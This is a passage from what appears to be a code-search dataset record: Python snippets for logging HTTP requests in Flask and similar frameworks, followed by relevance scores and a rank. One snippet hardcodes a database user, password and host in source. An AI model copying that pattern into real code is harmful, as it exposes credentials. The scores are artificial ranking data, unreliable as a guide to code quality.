applicable\n is_operation_request = bool(\n re.match(re.compile(\".*/api/versioned/v1/operations/.*\"), response.url)\n )\n is_get_request = response.request.method == \"GET\"\n if is_get_request and is_operation_request:\n wait_resp = _collect_operation_calls(response=response)\n all_responses.extend(wait_resp)\n\n all_json = [_response_to_json(r, ip_dict) for r in all_responses]\n f.writelines([f\"{j}\\n\" for j in all_json])", "def plain(self, *args):\n self.mylog.log(logging.INFO + 1, *args)", "def _info(self, func):\n self.logger.info(\"llamando a %s\" % func)", "def log_response(task_request, response):\n msg = \"{0.status_code} {0.reason} for {0.url}: {0.content}\".format(response)\n log_info(task_request, msg)", "def log_request(req: 'Flask_Request', results: str) -> None:\n\n with UseDatabase(app.config['dbconfig']) as cursor:\n _SQL_INSERT = \"\"\"insert into log_table\n (phrase, letters, ip, browser_string, results)\n values\n (?, ?, ?, ?, ?)\"\"\"\n\n cursor.execute(_SQL_INSERT,\n (req.form['phrase'], req.form['letter'], req.remote_addr, req.user_agent.browser,\n results,))", "def log_route():\n return send_file(path.join('..', 'app.log'), as_attachment=True)", "def event_log(self):\n pass", "def log_debug(self, line):\n logging.debug(\"Telemetry Logger - %s\" % line)", "def log_request(ingredient_list):\n logPath = getLogPath()\n ingredient_string = \"\".join([str(i) for i in ingredient_list])\n with open(logPath, 'a') as log:\n log.write(ingredient_string)\n log.write(\"\\n\")", "def log_exception(*args, **kwds):\n import logging\n logging.exception('Exception in request:')", "async def _request_started(self, request: Request):\n # When we consume the body, we replace the streaming mechanism with\n # a mocked version -- this workaround came from\n # https://github.com/encode/starlette/issues/495#issuecomment-513138055\n # and we call the workaround here to make sure that regardless of\n # `capture_body` settings, we will have access to the body if we need it.\n if self.client.config.capture_body != \"off\":\n await get_body(request)\n\n trace_parent = TraceParent.from_headers(dict(request.headers))\n self.client.begin_transaction(\"request\", trace_parent=trace_parent)\n\n await set_context(lambda: get_data_from_request(request, self.client.config, constants.TRANSACTION), \"request\")\n transaction_name = self.get_route_name(request) or request.url.path\n elasticapm.set_transaction_name(\"{} {}\".format(request.method, transaction_name), override=False)", "def dump_to_log(self):\n # self._send_request(\"/dumpToLog\")\n pass", "def before():\n app.logger.info(\"Local Timestamp: {}\".format(str(datetime.now())))\n app.logger.info(\"Request Method: {}\".format(request.method))\n app.logger.info(\"Request URL: {}\".format(request.url))\n app.logger.info(\"Request Access Route: {}\".format(request.access_route[0]))\n headers = \"\"\n for (key, value) in request.headers:\n # hide authorization header from logs\n if key == \"Authorization\":\n value = \"[provided]\" \n headers += \"{}: {}\\n\".format(key, value)\n app.logger.info(\"Request Headers:{}\\n{}\\n{}\".format(\"-\"*45,str(headers)[:-1], \"-\"*60))\n body = copy.deepcopy(request.json)\n if type(body) is dict and \"password\" in body:\n body['password'] = \"[provided]\"\n app.logger.info(\"Request Body: {}\".format(body))", "def log_login(sender, request, user, **kwargs):\n stracks.user(user).log(\"? 
has logged in\", action=stracks.login())", "def log_request(req: 'flask_request', res: str) -> None:\n\n _DBCONFIG = {'user': 'vsearch',\n 'password': 'vsearchpasswd',\n 'host': 'hfrey.de',\n 'database': 'vsearchlogDB'}\n\n conn = mysql.connector.connect(**_DBCONFIG)\n cursor = conn.cursor()\n\n _SQL = \"\"\"insert into log (phrase, letters, ip, browser_string, results)\n values\n (%s, %s, %s, %s, %s)\"\"\"\n cursor.execute(_SQL, (req.form['phrase'], req.form['letters'], req.remote_addr, req.user_agent.browser, res, ))\n\n cursor.close()\n conn.commit()\n conn.close()", "def after_request(response):\n logger = logging.getLogger(\"app.access\")\n logger.info(\n \"%s [%s] %s %s %s %s %s %s %s\",\n request.remote_addr,\n dt.utcnow().strftime(\"%d/%b/%Y:%H:%M:%S.%f\")[:-3],\n request.method,\n request.path,\n request.scheme,\n response.status,\n response.content_length,\n request.referrer,\n request.user_agent,\n )\n return response", "def log(a):", "def addLog(self, userId):\n user = [str(userId), 0]\n self.requestLog.append(user)", "def log_data(self):\n\n assert self.tello is not None\n self.tello.subscribe(self.tello.EVENT_LOG_DATA, self.log_handler)\n self.tello.subscribe(self.tello.EVENT_FLIGHT_DATA, self.log_handler)\n self.tello.subscribe(self.tello.EVENT_FILE_RECEIVED, self.log_handler)", "def getLog(request):\n # TODO: GET\n data = {}\n return data", "def alexa_handler(event, context, env_vars=None):\n\n if env_vars is None: # pragma: no cover\n env_vars = os.environ\n\n setup_logging()\n\n # If calling from a scheduled event, this is only a 'warmup' call\n if event.get('detail-type') == 'Scheduled Event':\n logging.info('Warmup only, returning early')\n return\n\n logging.debug('Event:\\n%s', json.dumps(event))\n\n latitude, longitude = get_geo_coordinates(event=event)\n response = query_dark_sky(latitude, longitude)\n weather = parse_weather(response)\n to_speak = build_text_to_speak(weather)\n\n return {\n 'version': '1.0',\n 'response': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': to_speak\n }\n }\n }", "def setup_logger():\n now = datetime.now()\n logging.basicConfig(level=logging.DEBUG)\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n logging.info(f\"Script run on: {now}\")", "def log(self, obj, action):\n action_dict = {'time': time.time(),\n 'action': action}\n self.log_data[obj.get_obj_id()]['actions'].append(action_dict)" ]
[ "0.68515676", "0.6780339", "0.6731675", "0.67187905", "0.6713761", "0.6655223", "0.66517013", "0.64173084", "0.6374145", "0.63045406", "0.6302998", "0.6223099", "0.62073785", "0.6184737", "0.61604834", "0.6096278", "0.6084718", "0.60662866", "0.60651225", "0.59968835", "0.59400016", "0.59400016", "0.59400016", "0.59150136", "0.59117985", "0.58781344", "0.5867439", "0.580209", "0.57844836", "0.576162", "0.5731217", "0.5719896", "0.5701477", "0.56761444", "0.5669072", "0.5665762", "0.5661233", "0.5638384", "0.56364477", "0.5625002", "0.5619377", "0.5610705", "0.5594473", "0.55890226", "0.55877393", "0.55695444", "0.5552156", "0.5537705", "0.55361223", "0.55314237", "0.5511112", "0.54975665", "0.54966867", "0.54952866", "0.5493595", "0.5493311", "0.5475885", "0.5463713", "0.5457853", "0.54571176", "0.54557854", "0.5449945", "0.54395866", "0.54349023", "0.5432736", "0.54150796", "0.54074365", "0.5405932", "0.53953964", "0.53925383", "0.5379017", "0.53729403", "0.5367559", "0.5346012", "0.5328533", "0.5313757", "0.52985847", "0.52980983", "0.52960205", "0.5292011", "0.5265793", "0.5264433", "0.5252554", "0.5237796", "0.5235913", "0.5232609", "0.52215797", "0.52215755", "0.52205765", "0.52178335", "0.5217022", "0.5200328", "0.51966155", "0.5191528", "0.5185677", "0.51837444", "0.5183283", "0.5182779" ]
0.7240547
2
Catch all exception handler, log exception and respond with custom message.
def all_exception_handler(handler_input, exception):
    # type: (HandlerInput, Exception) -> None
    print("Encountered following exception: {}".format(exception))
    speech = "That word is not in the dictionary. Please choose another word."
    handler_input.response_builder.speak(speech).ask(speech)
    return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def all_exception_handler(handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n speech = \"Sorry, an exception occurred. Please say again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n return handler_input.response_builder.response", "def all_exception_handler(handler_input, exception):\n return exception_request(handler_input, exception, logger)", "def exception_handler(self, exception):\n pass", "def all_exception_handler(handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speech = \"Sorry, there was some problem. Please try again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response", "def _default_error_handler(self, exception):\n\n self.log.error(exception)\n return '', 500", "def _exception_handler(self, loop: asyncio.AbstractEventLoop, context: dict):\n try:\n if 'exception' in context:\n exc = context['exception']\n print('Uncaught exception %s' % exc, file=sys.stderr)\n print(traceback.format_tb(exc.__traceback__), file=sys.stderr)\n if not self._ignore_exceptions:\n self.shutdown(1)\n else:\n print('Uncaught exception with unknown type ignored', file=sys.stderr)\n except:\n print('Something went seriously wrong. Error in error handler.', file=sys.stderr)\n print(context, file=sys.stderr)\n print(traceback.format_exc(), file=sys.stderr)", "def all_exception_handler(handler_input, exception):\n # type: (HandlerInput, Exception) -> None\n print(\"Encountered following exception: {}\".format(exception))\n\n speech = \"Sorry, there was some problem. Please try again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response", "def log_uncaught_exceptions(handler, registry):\n\n def log_uncaught_exceptions_tween(request):\n try:\n return handler(request)\n except WSGIHTTPException:\n raise\n except Exception:\n logger = get_logger(request)\n # We don't want to write arbitrary user-provided data into the\n # the logfiles. 
For example, the sort of data that might show\n # up in the payload of a ValueError exception.\n # Format the traceback using standard printing, but use repr()\n # on the exception value itself to avoid this issue.\n exc_type, exc_val, exc_tb = sys.exc_info()\n lines = [\"Uncaught exception while processing request:\\n\"]\n lines.append(\"%s %s\\n\" % (request.method, request.path_url))\n lines.extend(traceback.format_tb(exc_tb))\n lines.append(\"%r\\n\" % (exc_type,))\n lines.append(\"%r\\n\" % (exc_val,))\n logger.exception(\"\".join(lines))\n raise\n\n return log_uncaught_exceptions_tween", "def _catch_exceptions(self, exctype, value, tb):\n\n # Now we log it.\n self.error(\"Uncaught exception\", exc_info=(exctype, value, tb))\n\n # First, we print to stdout with some colouring.\n print_exception_formatted(exctype, value, tb)", "def handle_exceptions(\n generic_message='An error has occurred',\n status_code=500,\n error_handler=None):\n @web.middleware\n async def middleware(request, handler):\n try:\n response = await handler(request)\n return response\n except web.HTTPException:\n raise\n except Exception as ex:\n message = str(ex)\n if error_handler:\n error_handler(request, ex)\n logging.exception('Error: %s', message)\n return web.json_response(\n {'error': generic_message},\n status=status_code\n )\n return middleware", "def custom_exception_handler(exception, context):\n # Call REST framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler(exception, context)\n\n LOGGER.exception(exception)\n\n return response", "def _exception_dispatcher(self, e):\n # TODO Currently not doing anything\n raise e", "def handle_exception(e):\n print(e)\n return error()", "def register_error_handlers(self):\n\n def error_handler(error):\n if not isinstance(error, exceptions.HTTPException):\n error = exceptions.InternalServerError()\n return response.Response(bootstrap.card(body=_.span[_.p(style='color:#888')[error.description or ''],\n _.img(src=flask.url_for('mara_app.static',\n filename='mara.jpg'),\n style='margin-top:30px;max-width:100%;')]),\n title=f'{error.code} {error.name}',\n status=error.code)\n\n for cls in exceptions.HTTPException.__subclasses__():\n self.register_error_handler(cls, error_handler)", "def exceptions(e):\n ts = strftime('[%Y-%b-%d %H:%M]')\n tb = format_exc()\n app.logger.error('%s %s %s %s %s 5xx INTERNAL SERVER ERROR\\n%s',\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n tb)\n return jsonify(message=\"Internal Server Error\"), 500", "async def instana_exception_handler(request, exc):\n try:\n span = async_tracer.active_span\n\n if span is not None:\n if hasattr(exc, 'detail') and (500 <= exc.status_code <= 599):\n span.set_tag('http.error', exc.detail)\n span.set_tag('http.status_code', exc.status_code)\n except Exception:\n logger.debug(\"FastAPI instana_exception_handler: \", exc_info=True)\n\n return await http_exception_handler(request, exc)", "def exception(self, *args, **kwargs):\n\n message = self.get_message(*args, **kwargs)\n self.logger.exception(message)", "def handle_exception(self, exception, debug_mode): # pylint: disable-msg=C0103\n self.error(500)\n logger = logging\n if self.fsm:\n logger = self.fsm.logger\n logger.exception(\"FSMHandler caught Exception\")\n if debug_mode:\n import traceback, sys, cgi\n\n lines = ''.join(traceback.format_exception(*sys.exc_info()))\n self.response.clear()\n self.response.out.write('<pre>%s</pre>' % (cgi.escape(lines, 
quote=True)))", "def handle_exception(self, exception, debug):\n if isinstance(exception, webapp2.HTTPException):\n self._RawWrite(\"%d %s\" % (exception.code, exception.title))\n self.response.set_status(exception.code)\n else:\n logging.exception(exception)\n self._RawWrite(\"500 Server Error\")\n self.response.set_status(500)", "def root_simple_error_handler(exc, *args, app_name=''):\n\n #print('args',args)\n check_exception = 0\n for each_args in args:\n #print('each_args',each_args['view'].__module__)\n if each_args['view'].__module__ == 'hrms.views' or each_args['view'].__module__ == 'pms.views':\n #print('ok')\n check_exception = 1\n if isinstance(exc,ValidationError):\n print('ValidationError',exc)\n print('ValidationError',exc.get_codes())\n #n = dict(exc.detail)\n headers = {}\n if check_exception == 1:\n return Response({'error': exc.detail},status=exc.status_code,headers=headers)\n else:\n return Response(exc.detail,status=exc.status_code,headers=headers)\n\n elif isinstance(exc, exceptions.APIException):\n print('APIException',exc.get_full_details())\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['X-Throttle-Wait-Seconds'] = '%d' % exc.wait\n print('exc.detail',exc.detail)\n if check_exception == 1:\n return Response({'error': exc.detail},status=exc.status_code,headers=headers)\n else:\n return Response(exc.detail,status=exc.status_code,headers=headers)\n\n elif isinstance(exc, Http404):\n print('Http404')\n if check_exception == 1:\n return Response({'error': 'Not found'},status=status.HTTP_404_NOT_FOUND)\n else:\n return Response('Not found',status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n print('PermissionDenied')\n if check_exception == 1:\n return Response({'error': 'Permission denied'},\n status=status.HTTP_403_FORBIDDEN)\n else:\n return Response('Permission denied',status=status.HTTP_403_FORBIDDEN)\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def handle_exception(self, exception, debug):\n if isinstance(exception, webapp2.HTTPException):\n context = {'error': \"%d %s\" % (exception.code, exception.title), 'detail': exception.detail}\n self.response.set_status(exception.code)\n else:\n logging.exception(exception)\n context = {'error': \"500 Server Error\"}\n self.response.set_status(500)\n return self.render_json(context)", "def generic_exception_handler( exc, context ):\n # Call REST framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler( exc, context )\n\n if isinstance( exc, Http_error ):\n response = Response( exc.context, status=exc.status_code )\n set_rollback()\n\n return response", "def handle_error(self, err): # pragma: no cover\n # log every exception raised in the application\n print('we ended up in the API handle_error()', err, err.__class__)\n\n # catch other HTTP errors\n if isinstance(err, HTTPException):\n original = getattr(err, \"original_exception\", None)\n return jsonify({\n 'success': False,\n 'error': err.code,\n \"message\": getattr(err.error, 'message')\n }), err.code\n\n # if 'message' attribute isn't set, assume it's a core Python exception\n if not getattr(err, 'message', None):\n original = getattr(err, \"original_exception\", None)\n return jsonify({\n 'message': 'Server has encountered an unknown error'\n }), 500\n\n # Handle application-specific custom exceptions\n return jsonify(**err.kwargs), err.http_status_code", "def 
exceptions(e):\n # NOTE: add log entry\n str(getattr(e, \"code\", \"unavailable\"))\n log_error_code = str(getattr(e, \"code\", \"unavailable\"))\n service_log.error(\n f\"{request.remote_addr} {request.method} {request.scheme} {request.full_path}\\n\"\n f\"Error code: {log_error_code}\\n\"\n f\"Stack trace: {traceback.format_exc()}\"\n )\n\n # NOTE: craft user messages\n if hasattr(e, \"code\"):\n code = int(e.code)\n\n # NOTE: return an http error for methods with no body allowed. This prevents undesired exceptions.\n NO_PAYLOAD_METHODS = \"HEAD\"\n if request.method in NO_PAYLOAD_METHODS:\n return Response(status=code)\n\n error: ServiceError\n if code == 400:\n error = ProgramHttpRequestError(e)\n elif code == 404:\n error = ProgramHttpMissingError(e)\n elif code == 405:\n error = ProgramHttpMethodError(e)\n elif code == 408:\n error = ProgramHttpTimeoutError(e)\n else:\n error = ProgramHttpServerError(e, code)\n\n return error_response(error)\n\n # NOTE: Werkzeug exceptions should be covered above, the following line is for\n # unexpected HTTP server errors.\n return error_response(e)", "def log_exception(*args, **kwds):\n import logging\n logging.exception('Exception in request:')", "def custom_exception_handler(exc, context):\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n # Use the manually set message if it exists.\n if hasattr(exc, \"message\"):\n message = exc.message or ''\n # Otherwise construct the message from the details.\n else:\n message = ''\n for key in exc.detail:\n try:\n if isinstance(exc.detail[key], str):\n message += exc.detail[key] + ' '\n else:\n for error in exc.detail[key]:\n # Exclude duplicates.\n if error not in message:\n message += error + ' '\n except TypeError:\n if key == 'non_field_errors':\n message = exc.detail[key][0]\n else:\n message = _('Invalid request.')\n\n # Remove trailing whitespace.\n if message.endswith(' '):\n message = message[:-1]\n\n data = OrderedDict([\n ('status', 'error'), ('message', message), ('data', exc.detail)\n ])\n else:\n data = OrderedDict([('status', 'error'), ('message', exc.detail)])\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n elif isinstance(exc, Http404):\n msg = _('Not found.')\n data = {'status': 'error', 'message': msg}\n\n set_rollback()\n return Response(data, status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n msg = _('Permission denied.')\n data = {'status': 'error', 'message': msg}\n\n set_rollback()\n return Response(data, status=status.HTTP_403_FORBIDDEN)\n\n elif isinstance(exc, DjangoBaseException):\n data = {'status': 'error', 'message': exc.default_detail}\n\n set_rollback()\n return Response(data, status=exc.status_code)\n\n # If debug is false return a formatted error and raise an internal error.\n if not settings.DEBUG:\n logger.exception(exc)\n exc = DjangoBaseException()\n return Response(\n {'status': 'error', 'message': exc.default_detail},\n status=exc.status_code\n )\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def add_app_exception_handlers(app: Flask):\n\n from anubis.utils.http import error_response\n from anubis.utils.logging import logger\n\n # Set AuthenticationError handler\n @app.errorhandler(AuthenticationError)\n def handler_authentication_error(e: 
AuthenticationError):\n logger.error(traceback.format_exc())\n return jsonify(error_response(str(e) or 'Unauthenticated')), 401\n\n # Set LackCourseContext handler\n @app.errorhandler(LackCourseContext)\n def handle_lack_course_context(e: LackCourseContext):\n logger.error(traceback.format_exc())\n return jsonify(error_response(str(e) or 'Please set your course context'))\n\n @app.errorhandler(AssertError)\n def handle_assertion_error(e: AssertError):\n logger.error(traceback.format_exc())\n message, status_code = e.response()\n return jsonify(error_response(message)), status_code", "def process_exception(self, request, exception):\n logging.error(\"ERROR\")\n logging.error(traceback.format_exc())\n response = set_response(\"Internal server error\", False, 500, {})\n return JsonResponse(response, status=response[\"http_code\"])", "def _error_handling(self,e,func):\n print(self.type, \" sufferred exception in \" , func , \":\" , e)", "def handle_exception(e):\n maps = {\n exp.ServiceExp: api_exceptions.ServiceException,\n exp.PermissionExp: api_exceptions.ForbiddenException,\n exp.NotFoundExp: api_exceptions.NotFoundException,\n exp.ValueExp: api_exceptions.BadRequestException,\n exp.BadRequestExp: api_exceptions.BadRequestException,\n }\n raise maps[e.__class__](e.message)", "def custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n\n return Response(\n str(exc),\n status=response.status_code if response is not None else HTTP_500_INTERNAL_SERVER_ERROR,\n )", "def _exception_handler(self, exception_class, message):\n self.messages.append((exception_class, message))\n raise exception_class(message)", "def register_exceptions(app):\n\n @app.errorhandler(Exception)\n def exceptions(e):\n \"\"\"Exception handler that manages Flask/Werkzeug exceptions.\n\n For the other exception handlers check ``service/decorators.py``\n \"\"\"\n # NOTE: add log entry\n str(getattr(e, \"code\", \"unavailable\"))\n log_error_code = str(getattr(e, \"code\", \"unavailable\"))\n service_log.error(\n f\"{request.remote_addr} {request.method} {request.scheme} {request.full_path}\\n\"\n f\"Error code: {log_error_code}\\n\"\n f\"Stack trace: {traceback.format_exc()}\"\n )\n\n # NOTE: craft user messages\n if hasattr(e, \"code\"):\n code = int(e.code)\n\n # NOTE: return an http error for methods with no body allowed. 
This prevents undesired exceptions.\n NO_PAYLOAD_METHODS = \"HEAD\"\n if request.method in NO_PAYLOAD_METHODS:\n return Response(status=code)\n\n error: ServiceError\n if code == 400:\n error = ProgramHttpRequestError(e)\n elif code == 404:\n error = ProgramHttpMissingError(e)\n elif code == 405:\n error = ProgramHttpMethodError(e)\n elif code == 408:\n error = ProgramHttpTimeoutError(e)\n else:\n error = ProgramHttpServerError(e, code)\n\n return error_response(error)\n\n # NOTE: Werkzeug exceptions should be covered above, the following line is for\n # unexpected HTTP server errors.\n return error_response(e)", "def hook_server_inspect_exception(self, request_event, reply_event, exc_infos):\r\n task_context = self.hook_get_task_context()\r\n for functor in self._hooks['server_inspect_exception']:\r\n functor(request_event, reply_event, task_context, exc_infos)", "def handle_rest_exceptions(exception):\n current_app.logger.exception(exception)\n return exception.get_response()", "def _catch_all(ctx, *args, **kwargs):\n try:\n return func(ctx, *args, **kwargs)\n except click.Abort:\n # on SIGINT click.prompt raise click.Abort\n logger.error('') # just to get a newline\n # raise all click exceptions because they are used to bail and print a message\n except click.ClickException:\n # dont raise exception if --json was given so no error messages are printed\n # errors are printed in a json format in the json_decorator above\n if \"json\" in ctx.params and ctx.params['json']:\n return\n else:\n raise\n\n except Exception:\n # generic error string\n logger.error(uxstring.UxString.Error.server_err)\n\n # only dump the stack traces if the debug flag is set\n if \"TWO1_DEBUG\" in os.environ:\n logger.error(\"\\nFunction: {}.{}\".format(func.__module__, func.__name__), fg=\"red\")\n logger.error(\"Args: {}\".format(args), fg=\"red\")\n logger.error(\"Kwargs: {}\".format(kwargs), fg=\"red\")\n logger.error(\"{}\".format(traceback.format_exc()), fg=\"red\")", "def baseExceptionHandler(*args):\n\n\theader, frames, trcback = formatReport(*extractException(*args))\n\n\tLOGGER.error(\"!> {0}\".format(Constants.loggingSeparators))\n\tmap(lambda x: LOGGER.error(\"!> {0}\".format(x)), header)\n\n\tLOGGER.error(\"!> {0}\".format(Constants.loggingSeparators))\n\tmap(lambda x: LOGGER.error(\"!> {0}\".format(x)), frames)\n\n\tLOGGER.error(\"!> {0}\".format(Constants.loggingSeparators))\n\tsys.stderr.write(\"\\n\".join(trcback))\n\n\treturn True", "def error_handler(self, e, name, handler):\n msg = '' if handler else ' (no handler)'\n LOGGER.debug('Monitoring error handling %s %s: %s', name, msg, e)\n if handler:\n try:\n handler(e)\n except Exception as handler_exception:\n LOGGER.error('Monitoring exception %s fail: %s', name, handler_exception)\n LOGGER.exception(handler_exception)\n else:\n LOGGER.exception(e)", "def all_exception_handler(handler_input, exception):\n # type: (HandlerInput, Exception) -> None\n print(\"Encountered following exception: {}\".format(exception))\n\n speech = \"Mi dispiace, c'è stato un problema!!\"\n handler_input.response_builder.set_should_end_session(True)\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response", "def handle_exception(self, exception, debug):\n\n # build our error report\n error_report = {\n 'method': self.request.method,\n 'url': self.request.path_url,\n 'query_string': self.request.query_string,\n # 'data': environ.get('wsgi.input'),\n 'headers': dict(self.request.headers),\n 'env': dict((\n 
('REMOTE_ADDR', self.request.environ['REMOTE_ADDR']),\n ('SERVER_NAME', self.request.environ['SERVER_NAME']),\n ('SERVER_PORT', self.request.environ['SERVER_PORT']),\n )),\n }\n interface = 'sentry.interfaces.Http'\n\n try:\n client.captureException(data={interface: error_report})\n except HTTPException:\n logging.warning('Unable to contact sentry server')\n\n # Log the exception\n logging.exception(exception)\n\n # If the exception is a HTTPException, use its error code.\n # Otherwise use a generic 500 error code.\n if isinstance(exception, webapp2.HTTPException):\n self.response.set_status(exception.code)\n status_code = exception.code\n else:\n self.response.set_status(500)\n status_code = 500\n\n # collect our error data\n exc_info = sys.exc_info()\n\n # Set a custom message.\n if status_code == 500:\n self.render_response({'error': 'A server error has occurred'})\n # otherwise return the error message's value\n else:\n self.render_response({'error': str(exc_info[1])})", "def handle_exception(self, e):\n if isinstance(e, exceptions.APIException):\n return e.get_response(self.request)\n else:\n exc = exceptions.OtherException(self.request)\n return exc.get_response(self.request)", "def exceptionhandler(e):\n response = e.get_response()\n response.data = json.dumps({\n \"code\" : e.code,\n \"name\": e.name,\n \"description\": e.description\n })\n response.content_type = \"application/json\"\n\n return response", "def catch_backend_errors(handler, registry):\n def catch_backend_errors_tween(request):\n try:\n return handler(request)\n except BackendError as err:\n logger = get_logger(request)\n err_info = str(err)\n err_trace = traceback.format_exc()\n try:\n extra_info = \"user: %s\" % (request.user,)\n except Exception:\n extra_info = \"user: -\"\n error_log = \"%s\\n%s\\n%s\" % (err_info, err_trace, extra_info)\n hash = create_hash(error_log)\n logger.error(hash)\n logger.error(error_log)\n msg = json.dumps(\"application error: crash id %s\" % hash)\n if err.retry_after is not None:\n if err.retry_after == 0:\n retry_after = None\n else:\n retry_after = err.retry_after\n else:\n settings = request.registry.settings\n retry_after = settings.get(\"mozsvc.retry_after\", 1800)\n\n return HTTPServiceUnavailable(body=msg, retry_after=retry_after,\n content_type=\"application/json\")\n\n return catch_backend_errors_tween", "def exceptions(e):\n ts = strftime('[%Y-%b-%d %H:%M]')\n tb = traceback.format_exc()\n logger.error('%s %s %s %s %s 5xx INTERNAL SERVER ERROR\\n%s',\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n tb)\n return \"Internal Server Error\", 500", "def exception_handler(exc, context):\n if isinstance(exc, NotFoundException):\n exc = exceptions.NotFound()\n elif isinstance(exc, UnauthorizedException):\n exc = exceptions.PermissionDenied()\n elif isinstance(exc, exceptions.NotAuthenticated):\n exc = NotAuthenticated()\n\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['Retry-After'] = '%d' % exc.wait\n\n if isinstance(exc.detail, (list, dict)):\n data = exc.detail\n else:\n data = {'detail': exc.detail}\n\n set_rollback()\n return Response(data, status=exc.status_code, headers=headers)\n\n return None", "async def _handle_exception(self, e, sock):\n if isinstance(e, (RemoteProtocolError, AssertionError)):\n await sock.aclose()\n raise BadHttpResponse(\"Invalid HTTP response from server.\") from 
e\n\n if isinstance(e, Exception):\n await sock.aclose()\n raise e", "def handle_unknown_exception(exception):\n logger.exception(\"Unknown exception encountered:\")\n return Response(\n response=json.dumps(\n {\n \"value\": \"Amplium exception: %s\" % str(exception),\n \"status\": \"ERROR\"\n }\n ),\n status=500,\n mimetype=\"application/json\"\n )", "def _set_exception_hook(logger):\n\n def _hook(exc_type, exc_value, traceback):\n logger.error(\n \"An uncaught exception was raised in the plugin process:\",\n exc_info=(exc_type, exc_value, traceback),\n )\n\n sys.excepthook = _hook", "def exception_handler(exc):\n if isinstance(exc, exceptions.APIException):\n headers = {}\n if getattr(exc, 'auth_header', None):\n headers['WWW-Authenticate'] = exc.auth_header\n if getattr(exc, 'wait', None):\n headers['X-Throttle-Wait-Seconds'] = '%d' % exc.wait\n\n return Response({'error_code': CustomSerializer.get_api_code(exc.detail),\n 'error_message': exc.detail,\n 'errors': []},\n status=exc.status_code,\n headers=headers)\n\n elif isinstance(exc, Http404):\n return Response({'error_code': CustomSerializer.get_api_code('Not found'),\n 'error_message': 'Not found',\n 'errors': []},\n status=status.HTTP_404_NOT_FOUND)\n\n elif isinstance(exc, PermissionDenied):\n return Response({'error_code': CustomSerializer.get_api_code('You do not have permission to perform this action.'),\n 'error_message': 'You do not have permission to perform this action.',\n 'errors': []},\n status=status.HTTP_403_FORBIDDEN)\n\n # Note: Unhandled exceptions will raise a 500 error.\n return None", "def test_exception_in_exception_handler(exception_app):\n request, response = exception_app.test_client.get(\n '/error_in_error_handler_handler')\n assert response.status == 500\n assert response.body == b'An error occurred while handling an error'", "def handleException(self,e):\n # print (\"Handling Exception %s %s\" % (e.__class__.__name__, e.args))\n #\n # general pre-processing\n #\n # add filename to EnvironmentError for printout\n if isinstance(e,EnvironmentError):\n fn = e.filename\n if fn is not None and fn not in e.args: e.args += (fn,)\n #\n # specific processing\n #\n if isinstance(e,TransformError): return self.handleTransformError(e)\n elif isinstance(e,IncludeError): return self.handleIncludeError(e)\n elif isinstance(e,SystemExit): return self.handleSystemExit(e)\n elif isinstance(e,KeyboardInterrupt): return self.handleKeyboardInterrupt(e)\n elif isinstance(e,RuntimeError): return self.handleRuntimeError(e)\n elif type(e) in (AttributeError,NameError,TypeError,SyntaxError):\n return self.handlePythonSyntaxError(e)\n elif isinstance(e,Exception):\n if hasattr(e,'args') and type(e.args) == list and e.args:\n args0 = e.args[0]\n # test for some known strings\n if isinstance(args0, str):\n if args0.find('Failed to load DLL') != -1:\n return self.handleDllLoadError(e)\n # error was not handled\n return None", "def register_error_handlers(app: Flask):\n app.errorhandler(HTTPException)(jsonify_http_exception)\n\n # Don't jsonify an exception in dev mode\n if not app.config.get('DEBUG'):\n app.errorhandler(Exception)(jsonify_unknown_exception)", "def register_default_server_exception_handler(app: FastAPI):\n @app.exception_handler(status.HTTP_500_INTERNAL_SERVER_ERROR)\n async def default_server_exception_handler(request: Request, exception: Exception):\n response = get_response()\n logger.exception(\"Uncaught server exception: {exc}\", exc=exception)\n\n # Since the CORSMiddleware is not executed when an unhandled server 
exception\n # occurs, we need to manually set the CORS headers ourselves if we want the FE\n # to receive a proper JSON 500, opposed to a CORS error.\n # Setting CORS headers on server errors is a bit of a philosophical topic of\n # discussion in many frameworks, and it is currently not handled in FastAPI.\n # See dotnet core for a recent discussion, where ultimately it was\n # decided to return CORS headers on server failures:\n # https://github.com/dotnet/aspnetcore/issues/2378\n origin = request.headers.get('origin')\n\n if origin:\n # Have the middleware do the heavy lifting for us to parse\n # all the config, then update our response headers\n cors = CORSMiddleware(\n app=app,\n allow_origins=opal_common_config.ALLOWED_ORIGINS,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"])\n\n # Logic directly from Starlette's CORSMiddleware:\n # https://github.com/encode/starlette/blob/master/starlette/middleware/cors.py#L152\n\n response.headers.update(cors.simple_headers)\n has_cookie = \"cookie\" in request.headers\n\n # If request includes any cookie headers, then we must respond\n # with the specific origin instead of '*'.\n if 